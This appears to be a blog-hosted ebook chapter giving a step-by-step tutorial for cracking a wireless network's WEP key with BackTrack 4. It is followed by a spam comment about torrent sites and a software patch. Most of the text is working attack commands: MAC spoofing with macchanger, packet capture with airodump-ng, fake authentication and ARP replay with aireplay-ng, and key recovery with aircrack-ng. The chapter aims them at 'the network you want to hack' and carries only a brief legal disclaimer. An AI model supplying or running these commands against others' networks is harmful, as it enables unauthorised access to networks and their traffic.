This chapter will teach you how to crack the WEP of a wireless network using BackTrack 4 step by step. BackTrack is a free OS available for download at http://www.backtrack-linux.org/downloads/. This tutorial is using BackTrack 4, but it should work similar in newer versions. Backtrack is the ultimate security testing OS, and is preloaded with hundreds of tools you can use to hack. We're only going to be using a couple for this tutorial.
What you will need:
Computer (Windows, Mac, Linux, any OS)
Wireless card that supports promiscuous mode (Most do, if yours isn't compatible you can buy one that is at any computer store. Check compatibility here: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers&DokuWiki=68b8d15896f4851257a33e8133350dd7#which_is_the_best_card_to_buy)
Optional: Flash drive or blank DVD
Download the BackTrack 4 flavor of your choice. You can either boot the OS using VMware within windows, or you can boot backtrack straight off of a DVD or flash drive. Instructions for each of these methods are on the backtrack website.
Once you have booted up backtrack, it will ask you for a username and password. username: root password: toor
Now type startx and press enter. This will log you into backtrack and you should now see the desktop.
Open a command terminal. You can do this by clicking the black box icon bottom left corner of the screen.
type in: airmon-ng
Look for the name of your wireless card, its different for a lot of computers, mine is wlan0, so for the rest of this guide thats what i'm going to use. Replace wlan0 in all the following steps with whatever your device name is.
type: airmon-ng stop wlan0
type: macchanger --mac 00:11:22:33:44:55 wlan0
type: airmon-ng start wlan0
type: airodump-ng wlan0
You will now see all of the wifi networks in range. once you found the one you want to hack, press Ctrl + C to stop scanning. Take note of the bssid and channel of the network you want to hack.
type: airodump-ng -c (put the channel # here) -w wephack --bssid (enter bssid here) wlan0
Keep that window open, now open another command terminal and enter the following in the newly opened terminal:
type: aireplay-ng -1 0 -a (enter bssid here) -h 00:11:22:33:44:55 wlan0
type: aireplay-ng -3 -b (enter bssid here) -h 00:11:22:33:44:55 wlan0
Now go back to the 1st window, you'll notice a number steadily increasing. Once its over about 10,000 you can attempt to crack the WEP key. If this doesn't work, wait until the # is even higher, try again at 15,000 and so on
open a new command window and type: aircrack-ng -b (enter bssid) wephack-01.cap
You should now see it attempting to crack the WEP key. This could take up to 5 minutes or so depending on how fast your computer is. When its found the key, it will appear on the screen. You can now log into that network using the WEP on the screen :)
NOTES:
Usually, for this to work flawlessly, someone has to be currently using the internet on the network you're trying to hack, or else it could take awhile for you to get enough packets to crack the WEP.
It is illegal to steal wireless internet. Only try this on your own network. This guide is for educational purposes only, as with everything in this ebook. Use at your own risk.
1 comments:
Click here for commentspiratebay down i still cant belive. I still question sometimes in my own "is the pirate bay down". Though "pirate bay down" there were many good "tpb torrent" sites like "offlinebay. idm patch file
ConversionConversion EmoticonEmoticon